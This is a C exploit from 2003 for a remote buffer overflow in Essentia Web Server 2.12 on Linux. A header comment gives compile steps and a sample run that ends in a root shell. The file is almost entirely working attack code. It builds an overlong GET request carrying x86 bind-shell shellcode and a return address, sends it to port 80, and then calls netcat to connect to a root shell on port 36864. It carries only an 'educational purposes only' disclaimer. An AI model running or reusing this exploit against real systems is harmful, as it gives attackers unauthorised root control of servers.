/*

	Title:		Remote Buffer Overflow in Essentia Webserver.
	Author:		By B-r00t <br00t@blueyonder.co.uk

	Date:		04/07/2003
	Reference:	http://www.essencomp.com/
	Versions:	Essentia Web Server 2.12 (Linux) => VULNERABLE
	Related Info:	http://www.securityfocus.com/bid/4159/info/

	Exploit:	essenexploit.c
	Compile:	gcc -o essenexploit essenexploit.c
			Exploit binds a r00tshell to port 36864.
			Tested on Redhat 7.2 & 7.1
			THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!



$ telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 04 Jul 2003 11:19:39 GMT
Server: Essentia Web Server 2.12 (Linux)
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 757
ETag: "f104b5-5f2-0b7940f3"
Last-Modified: Thu, 03 Jul 2003 20:53:04 GMT

Connection closed by foreign host.



$ ./essenexploit 127.0.0.1
essenexploit by B-r00t <br00t@blueyonder.co.uk>. (c) 2003

Number of bytes sent: 2057 / 2057

Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!
localhost.localdomain [127.0.0.1] 36864 (?) open
uname -a; id;
Linux RedHat7-2 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)



ENJOY!
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define EXPLOIT "essenexploit"
#define DEST_PORT 80
#define NOP "A"

int main ( int argc, char *argv[] )
{

// Vars 
int socketfd, loop, bytes;
struct sockaddr_in dest_addr;
char *TARGET = "TARGET";
char buf[2100], *ptr;
// Big fat slide NOP so ret should be good everywhere!
char ret[] = "\xe8\xc5\xff\xbe\xe8\xc5\xff\xbe";
char shellcode[] =
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";


printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n", EXPLOIT);

if (argc < 2) 
{
        printf ("\nUsage: %s [IP_ADDRESS]", EXPLOIT);
        printf ("\nExample: %s 10.0.0.1 \n", EXPLOIT);
        printf ("\nOn success a r00tshell will be spawned on port 36864.\n\n");
        exit (-1);
}

setenv (TARGET, argv[1], 1);

// Build buf
memset (buf, '\0', sizeof (buf));
ptr = buf;
strcat (buf, "GET /");

for (loop = 1; loop < 2033-sizeof(shellcode); loop++) 
strcat (buf, NOP);

strcat (buf, shellcode);
strcat (buf, ret);
strcat (buf, " HTTP/1.0");
strcat (buf, "\x0D\x0A\x0D\x0A");

// Socket
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("\nsocket error\n");
        exit (1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
        perror("inet_aton problems");
        exit (2);
        }

memset( &(dest_addr.sin_zero), '\0', 8);

if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("\nconnect failed\n");
        close (socketfd);
        exit (3);
        }

// Wallop!
bytes = (send (socketfd, ptr, strlen(buf), 0));
if (bytes == -1) {
        perror("\nsend error\n");
        close (socketfd);
        exit(4);
        }
close (socketfd);
if (bytes < strlen(buf))
printf ("\nNetwork Error - Full Payload Was NOT sent!");

printf ("\n\nNumber of bytes sent: %d / %d\n", bytes, strlen(buf));
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ...!\n");
sleep (3);
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
} // end main

/*

Shoutz: Marshal-l, Rux0r, blunt, macavity, Monkfish
	Rewd, Maz. That One Doris ... U-Know-Who-U-R!
	The doris.scriptkiddie.net posse.

Author:	B-r00t aka B#. 2003. <br00t@blueyonder.co.uk> (c)
	"If You Can't B-r00t Then Just B#."

	ENJOY! 
*/